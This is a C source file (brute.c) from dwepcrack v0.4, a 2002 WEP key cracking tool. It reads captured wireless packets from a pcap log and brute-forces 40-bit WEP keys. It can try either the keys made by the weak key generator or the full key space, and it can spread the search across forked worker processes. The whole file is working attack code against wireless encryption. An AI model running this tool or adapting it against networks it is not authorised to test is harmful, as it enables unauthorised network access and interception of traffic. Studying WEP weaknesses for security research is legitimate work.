/*
 * dwepcrack v0.4 [brute.c]
 * by h1kari - (c) Dachb0den Labs 2002
 */

/*
 * Copyright (c) 2002 Dachb0den Labs.
 *      David Hulton <h1kari@dachb0den.com>.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by David Hulton.
 * 4. Neither the name of the author nor the names of any co-contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY David Hulton AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL David Hulton OR THE VOICES IN HIS HEAD
 * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
 * THE POSSIBILITY OF SUCH DAMAGE.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>

#include <pcap.h>

#include "dwepcrack.h"

/*
 * open up the logfile and start reading packets. once we grab the smallest
 * data packet, run it through the brute forcer.
 */
#define MAX_OCTET 256
#define MAX_SEED  0x1000000
void
brutecrack(char *filename)
{
  u_int i, diff, top, min, max;
  pid_t pid[jobs];

  getsmallpkt(filename);

  printf("starting brute force crack on smallest packet:\n");

  wep_init(small_pkt, small_len, 1);

  putchar('\n');
  printf(PROGRESS);
  fflush(stdout);

  if(jobs)
  {
    signal(SIGCHLD, chld_handler);

    top = entire ? MAX_OCTET : MAX_SEED;
    diff = top / jobs;
    for(i = 0; i < jobs; i++)
    {
      if(!(pid[i] = fork()))
      {
        min = diff * i;
        max = (i == jobs - 1 ? top : diff * (i + 1));

        if(entire)
          exit(try_entire_keys(min, max));
        else
          exit(try_optimized_keys(min, max));
      }
      else
        children++;
    }

    while(children > 0)
      sigpause(0);

    for(i = 0; i < jobs; i++)
      kill(pid[i], SIGKILL);
  }
  else if(entire)
    try_entire_keys(0, MAX_OCTET);
  else
    try_optimized_keys(0, MAX_SEED);

  printf("\n\n");
}

/*
 * try brute forcing only keys that are generated by the weak key generator
 */
int
try_optimized_keys(int idx, int len)
{
  int i, mod;
  u_char keys[WEP_KEY_STORE];

  mod = MAX((MAX_SEED / (max_cols - PROG_OFFSET)), 2);

  for(i = idx; i < len; i++)
  {
    if((i % mod) == 0)
    {
      putchar('.');
      fflush(stdout);
    }

    if(i & 0x808080)
      continue;

    wep_seedkeygen40(i, keys);
    if(wep_try_verify_key(keys, 4, verify_pkt, verify_len) != -1)
      return 0;
  }

  return -1;
}

/*
 * try to brute force the entire key range with specified min and max values
 * if try_recurs_keys returns 0, it means we've got our key.
 */
int
try_entire_keys(int idx, int len)
{
  int i;
  u_char key[WEP_KEY_SIZE];

  memset((u_char *)key, 0, WEP_KEY_SIZE);

  for(i = idx; i < len; i++)
  {
    key[0] = i;

    if(try_recurs_keys(1, key) == 0)
      return 0;
  }

  return -1;
}

/*
 * recursively loop through the keys and try all of the combinations, return 0
 * if we find the right key and keep returning 0 until we loop back to
 * try_entire_keys.
 */
int
try_recurs_keys(int idx, u_char *key)
{
  int i;

  for(i = 0; i < MAX_OCTET; i++)
  {
    key[idx] = i;

    if(idx < (WEP_KEY_SIZE - 1))
    {
      if(idx == 2)
      {
        putchar('.');
        fflush(stdout);
      }

      if(try_recurs_keys(idx + 1, key) == 0)
        return 0;
    }
    else if(wep_try_verify_key(key, 1, verify_pkt, verify_len) != -1)
      return 0;
  }

  return -1;
}
